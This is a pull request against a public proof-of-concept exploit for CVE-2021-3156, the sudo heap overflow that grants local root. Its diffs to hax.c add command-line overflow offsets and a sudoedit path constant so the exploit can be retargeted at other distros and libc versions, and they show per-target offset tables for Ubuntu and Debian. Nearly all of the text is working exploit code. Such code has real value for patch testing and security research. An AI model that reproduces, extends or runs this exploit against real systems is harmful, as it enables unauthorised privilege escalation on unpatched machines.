### PR TITLE
get offests from argv and define sudoedit path as constant

### DIFF
--- a/hax.c
+++ b/hax.c
@@ -26,6 +26,7 @@
 
 // 512 environment variables should be enough for everyone
 #define MAX_ENVP 512
+#define SUDOEDIT_PATH "/usr/bin/sudoedit"
 
 typedef struct {
 	char *target_name;
@@ -40,7 +41,7 @@ target_t targets[] = {
     {
         // Yes, same values as 20.04.1, but also confirmed.
         .target_name    = "Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27",
-        .sudoedit_path  = "/usr/bin/sudoedit",
+        .sudoedit_path  = SUDOEDIT_PATH,
         .smash_len_a    = 56,
         .smash_len_b    = 54,
         .null_stomp_len = 63, 
@@ -48,7 +49,7 @@ target_t targets[] = {
     },
     {
         .target_name    = "Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31",
-        .sudoedit_path  = "/usr/bin/sudoedit",
+        .sudoedit_path  = SUDOEDIT_PATH,
         .smash_len_a    = 56,
         .smash_len_b    = 54,
         .null_stomp_len = 63, 
@@ -56,7 +57,7 @@ target_t targets[] = {
     },
     {
         .target_name    = "Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28",
-        .sudoedit_path  = "/usr/bin/sudoedit",
+        .sudoedit_path  = SUDOEDIT_PATH,
         .smash_len_a    = 64,
         .smash_len_b    = 49,
         .null_stomp_len = 60, 
@@ -96,7 +97,7 @@ int main(int argc, char *argv[]) {
     }  else {
         target = &targets[ 0 ];
         target->target_name    = "Manual";
-        target->sudoedit_path  = "/usr/bin/sudoedit";
+        target->sudoedit_path  = SUDOEDIT_PATH;
         target->smash_len_a    = atoi(argv[1]);
         target->smash_len_b    = atoi(argv[2]);
         target->null_stomp_len = atoi(argv[3]); 

--- a/hax.c
+++ b/hax.c
@@ -78,19 +78,30 @@ void usage(char *prog) {
 int main(int argc, char *argv[]) {
     printf("\n** CVE-2021-3156 PoC by blasty <peter@haxx.in>\n\n");
 
-    if (argc != 2) {
+    if (argc != 2 && argc != 5) {
         usage(argv[0]);
         return -1;
     }
 
-    int target_idx = atoi(argv[1]);
+    target_t *target = NULL;
+    if (argc == 2) {
+        int target_idx = atoi(argv[1]);
 
-    if (target_idx < 0 || target_idx >= (sizeof(targets) / sizeof(target_t))) {
-        fprintf(stderr, "invalid target index\n");
-        return -1;
+        if (target_idx < 0 || target_idx >= (sizeof(targets) / sizeof(target_t))) {
+            fprintf(stderr, "invalid target index\n");
+            return -1;
+        }
+
+        target = &targets[ target_idx ];
+    }  else {
+        target = &targets[ 0 ];
+        target->target_name    = "Manual";
+        target->sudoedit_path  = "/usr/bin/sudoedit";
+        target->smash_len_a    = atoi(argv[1]);
+        target->smash_len_b    = atoi(argv[2]);
+        target->null_stomp_len = atoi(argv[3]); 
+        target->lc_all_len     = atoi(argv[4]);
     }
-
-    target_t *target = &targets[ target_idx ];
 
     printf("using target: '%s'\n", target->target_name);
 


### PR DESCRIPTION
Hi,
I've added some code to take offsets from argv so it will be easier to try custom ones (for different distro, in different libc, etc)
and I've also defined the sudoedit path as constant so can be easily changed in one place when compiling if sudoedit isn't in the standard location.